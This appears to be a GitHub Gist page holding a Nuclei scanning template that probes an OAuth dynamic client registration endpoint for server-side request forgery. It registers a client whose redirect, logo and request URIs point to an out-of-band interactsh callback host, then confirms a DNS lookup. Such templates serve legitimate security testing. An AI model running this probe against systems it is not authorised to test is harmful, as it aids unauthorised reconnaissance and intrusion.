-
-
Save emadshanab/2ecc0850e39f9e9f3a0571143a393d08 to your computer and use it in GitHub Desktop.
I created this YAML script to work with Nuclei to find possible SSRF Vulnerabilities in an automated way
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: ssrf-via-oauth-misconfig | |
| info: | |
| name: SSRF due to misconfiguration in OAuth | |
| author: KabirSuda | |
| severity: medium | |
| description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters. | |
| tags: misconfig,oob,oauth | |
| reference: https://portswigger.net/research/hidden-oauth-attack-vectors | |
| requests: | |
| - raw: | |
| - | | |
| POST /connect/register HTTP/1.1 | |
| Host: {{Hostname}} | |
| Content-Type: application/json | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 | |
| Accept-Language: en-US,en;q=0.9 | |
| Connection: close | |
| { | |
| "application_type": "web", | |
| "redirect_uris": ["https://{{interactsh-url}}/callback"], | |
| "client_name": "{{Hostname}}", | |
| "logo_uri": "https://{{interactsh-url}}/favicon.ico", | |
| "subject_type": "pairwise", | |
| "token_endpoint_auth_method": "client_secret_basic", | |
| "request_uris": ["https://{{interactsh-url}}"] | |
| } | |
| matchers: | |
| - type: word | |
| part: interactsh_protocol # Confirms the DNS Interaction | |
| words: | |
| - "dns" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment